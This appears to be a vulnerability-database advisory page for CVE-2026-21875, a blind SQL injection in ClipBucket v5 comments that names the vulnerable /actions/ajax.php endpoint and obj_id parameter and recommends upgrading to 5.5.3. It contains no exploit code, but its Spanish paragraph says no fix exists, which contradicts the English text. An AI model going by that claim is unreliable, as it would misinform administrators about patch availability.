Platform
php
Component
clipbucket-v5
Fixed in
5.5.3
CVE-2026-21875 describes a critical SQL Injection vulnerability discovered in ClipBucket v5, an open-source video sharing platform. This flaw allows attackers to inject malicious SQL code through the add comment section of a channel, potentially leading to unauthorized data access and manipulation. Versions 5.5.2-#187 and earlier are affected, and a patch is available in version 5.5.3.
The SQL Injection vulnerability in ClipBucket allows an attacker to bypass authentication and execute arbitrary SQL queries against the database. This could lead to the extraction of sensitive information such as user credentials, video metadata, and potentially even the entire database contents. Successful exploitation could also allow an attacker to modify or delete data, leading to denial of service or further compromise of the system. The blind nature of the injection means attackers may need to perform multiple requests to extract data, but the potential impact remains significant.
This vulnerability was publicly disclosed on 2026-01-07. While no active exploitation campaigns have been publicly reported, the CRITICAL severity and ease of exploitation suggest a high probability of exploitation. No Proof of Concept (PoC) code has been publicly released as of this writing, but the vulnerability's nature makes it likely that one will emerge. It is not currently listed on the CISA KEV catalog.
Exploit Status
EPSS
0.05% (14% percentile)
CISA SSVC
CVSS Vector
The primary mitigation for CVE-2026-21875 is to immediately upgrade ClipBucket to version 5.5.3 or later, which contains the fix. If upgrading is not immediately possible, consider implementing a Web Application Firewall (WAF) rule to filter out suspicious SQL injection attempts targeting the /actions/ajax.php endpoint, specifically focusing on the obj_id parameter. Input validation and sanitization on the server-side can also help reduce the attack surface. Monitor application logs for unusual database activity.
Actualice ClipBucket a una versión posterior a 5.5.2-#187 cuando haya una disponible. Dado que no hay una solución disponible al momento de la publicación, considere implementar medidas de seguridad adicionales, como la validación y sanitización de entradas, para mitigar el riesgo de inyección SQL hasta que se publique una actualización.
Vulnerability analysis and critical alerts directly to your inbox.
CVE-2026-21875 is a critical SQL Injection vulnerability affecting ClipBucket video sharing platform versions 5.5.2-#187 and earlier, allowing attackers to inject malicious SQL code.
You are affected if you are running ClipBucket version 5.5.2-#187 or earlier. Upgrade to version 5.5.3 or later to resolve the vulnerability.
The recommended fix is to upgrade ClipBucket to version 5.5.3 or later. As a temporary workaround, implement a WAF rule to filter malicious SQL injection attempts.
While no active exploitation campaigns have been publicly confirmed, the vulnerability's severity and ease of exploitation suggest a high probability of exploitation.
Refer to the ClipBucket project's official website or security advisories for the latest information and updates regarding CVE-2026-21875.
Upload your dependency file and we'll tell you instantly if this and other CVEs hit you.